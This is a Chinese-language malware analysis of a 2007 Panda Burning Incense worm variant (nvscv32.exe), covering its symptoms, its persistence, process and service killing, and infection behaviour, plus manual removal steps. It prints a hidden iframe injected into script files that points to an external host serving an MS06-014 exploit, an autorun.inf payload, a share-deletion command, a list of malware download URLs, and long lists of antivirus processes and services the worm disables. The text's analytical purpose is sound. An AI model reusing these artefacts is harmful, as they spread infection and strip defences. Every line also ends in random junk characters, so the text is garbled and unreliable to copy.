熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe 5n::]Q%=D  
kT^`j^Jr  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） bHDZ=Ik  
@q|c|X:I  
中文名称：（尼姆亚，熊猫烧香） ^MWp{E  
*TL3-S?  
病毒大小：68,570 字节 %~<F7qB  
UHI<8o9  
编写语言：Borland Delphi 6.0 - 7.0 E0A[{UA   
h-03]M#8=  
加壳方式：FSG 2.0 -> bart/xt e{Mkwi+j  
xM&`>`;^e  
发现时间：2007.1.16 C;Kq_/l  
n2opy8J#!  
危害等级：高 w~AO;X*Ke"  
%zjyZ{=  
一、病毒描述： |UQGZ  
rB =c
  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 R|\kk?,u  
m*AiP]Qu  
二：中毒现象： [xDn=)`{V  
m7cG]a~a  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 _:XX+3W7  
fHF*#  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 J32"Ytdo<  
aqP"Y9l  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 (]"`>,ray  
()_^:WQO?  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> <@c9S,@t  


*Fd(  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 wemhP8!gc  
ZyrVv\'  
6：不能正常使用任务管理器，SREng.exe等工具。 q$B|a5a?  
.A7ON1lc^C  
7：无故的向外发包，连接局域网中其他机器。 g|
{Ru  
aslb^  
三：技术分析 K!tM "`a  
,/-DAo~O  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe \`?4PQ  
a;G
>56iw  
建立注册表自启动项: ?2S<D5MSb  
6 Znt   
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] xQs._YY  
n?NUnF
A  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" JF9r[%  
=nUzBL%~  
2：查找反病毒窗体病毒结束相关进程: p v*f]Yzx  
rW
2   
天网防火墙 Mir( }E  
t|59/R  
virusscan -aM7>YR  
$*+`;PG-  
symantec antivirus vn.j>;E'  
f!}e*oX  
system safety monitor Uclta  
M
^y5 Dep  
system repair engineer ^4 ~ V/  
6$5SS#  
wrapped gift killer %xN91j["  
$_u)~O4$  
游戏木马检测大师 s,8g^aF4  
A~wVY  
超级巡警 . L]!*  
kIH)>euZ  
3：结束以下进程: ?_@Mg\Hc
 
6;}W)S  
mcshield.exe
5NhwIu^<  
}b]z+4Ua(  
vstskmgr.exe 9:CM#N~?o  
6F?U:N#<  
naprdmgr.exe h~.z[  
a>)|SfsE  
updaterui.exe b^&nr[DC  
@HP7$
U"  
tbmon.exe uVLKR PY  
2PEA<{u  
scan32.exe >?^_JEC6  
%g=SkQ&d  
ravmond.exe ),U>AiF]  
k`r`ZA(kQ-  
ccenter.exe W
[oQp2 =  
"S0WFP\P+  
ravtask.exe oz?pE[[tm  
oGqbk x  
rav.exe oz/Nx{bg  
2!g7F`/B  
ravmon.exe \t%rIr  
HpR(DG) ?  
ravmond.exe bjB4  
{Nny.@P)H  
ravstub.exe VK]sK e  
vUgMfy&  
kvxp.kxp ^ub@Jwe  
])$Rw$`w  
kvmonxp.kxp |Fp+9U  
tF~D!t@  
kvcenter.kxp T8-,t];i  
I@o42%w2  
kvsrvxp.exe U|)CZcM  
qI5`:PH%n  
kregex.exe Ggp.%kS6F  
;wj8:9 ;  
uihost.exe 3YJa3fflK  
h4k.1yH;  
trojdie.kxp %H8s_O  
b=Oec%Adx  
frogagent.exe *_!}g ]  
fHR^?\VVp  
kvxp.kxp ~)IiF.I b  
_jD\kg#LY  
kvmonxp.kxp pn-`QB:{h  
qfl#ki`,  
kvcenter.kxp 5 p! rZ  
[mA\,ny9  
kvsrvxp.exe fFJu]  
oS Apa  
kregex.exe l"1at eM3  
zJX _EO  
uihost.exe DNy 6Kw  
Eao^/MKx-  
trojdie.kxp K%RjWX=H  
Vs@H>97,
G  
frogagent.exe o=y0=,:a?9  
Ee 15Y$1  
logo1_.exe We?cRb  
;FO( mL(  
logo_1.exe ?)?}^  
&(i_s  
rundl132.exe /YT _~q=:  
XCUU(H  
taskmgr.exe 6Dz N.fz  
 Va3/#is'  
msconfig.exe Y]])Tq;h5  
{bD:OF  
regedit.exe PiZU_~A  
:DoE_  
sreng.exe /7jb&f   
4：禁用下列服务: wC`+^>WFo  
\:D"#s%x  
schedule HGl.dO7NU  
"z9 p(|oZ  
sharedaccess br4?_,  
/+ Q3JS(  
rsccenter 4"~l^yK  
VL2+"<  
rsravmon G%5ZG$as  
bTbF  
rsccenter nC(<eL  
/;clxtus  
kvwsc s5 ($b  
`Tk GI0q  
kvsrvxp ViYfK7Z  
!@4 i:,p@  
kvwsc Z+g9!
@'a  
jN T+?2  
kvsrvxp <tto8Y j  
l _gJC.  
kavsvc 4c9a"v  
g#b9xTGJ^  
avp s|\\"3  
X<mlaXwrA  
avp x
".!&5  
gnN"6r1  
kavsvc xZ(ryE%  
)];Bo.QA  
mcafeeframework CRs@x` 5ue  
FW)VyVFmk  
mcshield p-XO4Pc6  
4=qZ Z>[t  
mctaskmanager 6<mlx'  
w9TE E,t;5  
mcafeeframework Y1R?,5  
C2C1 @=w  
mcshield kJK*wq]U6  
\[&&4CN{  
mctaskmanager s`gfz}/  
RmRPR<vGW  
navapsvc A~({vb'  
bCqTubbx!t  
wscsvc sf"vii,1A  
/ }Pj^^6A<  
kpfwsvc c<,R,DR  
K$I`&M(
 
sndsrvc y}1Pc
*  
Y49&EQ  
ccproxy s w
{e |  
i ?PgYk&}  
ccevtmgr s;cGf+  
*Gul|Lp$<I  
ccsetmgr nzU;Bi^m  
"h-ZwL  
spbbcsvc b3Qk;yz  
}#h`1 uV  
symantec core lc jss.j~
8  
Mj`g84  
npfmntor \,ne7G21j  
b/?)_pg  
mskservice 54].p7  
P^AI*tH"m  
firesvc 28qlp>U  
>t{-_4Yv?  
5：删除下列注册表项: +ZOK
fX  
2Z>8ROv^X  
software\microsoft\windows\currentversion\run\ravtask _L+j6N.h1  
zx5#eMD  
software\microsoft\windows\currentversion\run\kvmonxp (67byO{  
X;n09 L`CB  
software\microsoft\windows\currentversion\run\kav +)LCYDRV7  
09qfnQG  
software\microsoft\windows\currentversion\run\kavpersonal50 BA[ uO3\4  
Q5lt[2Zyzd  
software\microsoft\windows\currentversion\run\mcafeeupdaterui 3CH>!QOA  
OG9 '[o`8  
software\microsoft\windows\currentversion\run\network associates error reporting service U\(71=  
$[Q;{Q  
software\microsoft\windows\currentversion\run\shstatexe &(lQgi+^!  
/>N#PF  
software\microsoft\windows\currentversion\run\ylive.exe !_FTy^@c2  
6_:I~TTX  
software\microsoft\windows\currentversion\run\yassistse 9khMG$  
IXG@$O?y/  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） (%OZ `?`  
_xmQGX!|  
7：跳过下列目录: $6(a6!  
N<ux4tz  
windows ?GlXxx=eV  
r.lHlHl  
winnt Xmi~fie  
Zl>dB
c%  
systemvolumeinformation ,Js-'vX  
M4D  @G  
recycled '4_c;](W  
Paeq  
windowsnt ?4oP=.  
I,<?Kv  
windowsupdate S}a]Bt  
plp-[eKcD  
windowsmediaplayer qZ4))X  
Bgn%d4W;G  
outlookexpress ;6~5FTmV  
,i1BoG  
netmeeting PfyJJAQ[  
|}.}q  
commonfiles k~gOL#$  
]-9w'K d  
complusapplications vK[%cA"  
YYT#{>&  
commonfiles <_ENC>NP  
ec`re+1r  
messenger !l=)$RJKdD  
!^ad{#|X  
installshieldinstallationinformation _6V1oe2  
YSB=nd_  
msn &q@brX<,=  
k}p8"'O  
microsoftfrontpage IxS%V31  
H%XF~tF:  
moviemaker Fe4>G8uuwn  
d,?Tq  
msngaminzone Ix}6%2\  
1]eRragm"  
8：删除*.gho备份文件. 7F6B  
vzFpXdt  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. [8^q3o7n  
GGhk~H4OP  
autorun.inf内容： NPS*
0y/  
g&85L$   
程序代码 S<-nlBs.  
Eh ";irE  
[AutoRun] D%nd7 |  
kaXq.  
OPEN=setup.exe QF\nf_X  
q[C?1Kc.z  
shellexecute=setup.exe &e@)yVLL  
gK9d `5  
shell\Auto\command=setup.exe 5K2K'ZkI  
tV
`=o$`  
10：删除共享：cmd.exe /c net share admin$ /del /y ^a_a%ws
 
*;]}`r  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 L/r_MtN  
9i}$245lB  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 Pv/v=s>X  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 jT=|!,Pn  
N{S) b  
目前下载列表如下： |Rz.Pt6  
{\(MMTQ  
http://www.krvkr.com/down/cq.exe d_M+W@{  
CpmT*  
http://www.krvkr.com/down/mh.exe |Z<\kx  
#$-E5R;x  
http://www.krvkr.com/down/my.exe |DJ8 "T]E  
t+iHsCG)>  
http://www.krvkr.com/down/wl.exe 1QG q;6\  
5C9b*]-#  
http://www.krvkr.com/down/rx.exe =I546($  
kuy?n-1g  
http://www.krvkr.com/down/wow.exe B(++*#T!^m  
ZQ_6I}i")  
http://www.krvkr.com/down/zt.exe T5."3i  
Ly+UY.v"  
http://www.krvkr.com/down/wm.exe !T][c~l  
3@Mh* \;\b  
http://www.krvkr.com/down/dj.exe 5tQz!M  
mGj)Zrx>  
http://www.krvkr.com/cn/iechajian.exe #mw!_]  
%7)TiT4V
 
到此病毒行为分析完毕。 2CO/K_Q  
]`|$nU}v  
四：Sec120.Com专家解决方案： 3TF_$bd{  
7TMq#Pb  
1：关闭网络共享，断开网络。 ,UMr_ e{|  
w3(|A> s3  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） i
VI&  
oCaYmi=:  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 p
)yP_P  
gmRc4o  
4：删除注册表启动项 QDg5B6>$  
P3&s<mh  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] D4!;*2t  
0%rDDB  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" }}=n]_f  
@%Ld\8vdfJ  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe iY,C0=n5Y  
qY#*LqV  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 qjP~F  
rF-SvSj}  
7：如果电脑上有脚本文件，将病毒代码全部删除。 0\tac/  
9j>2C  
8：关闭系统的自动播放功能。 &-yRa45?  
bE !SW2:M  
这样就基本上将病毒清除了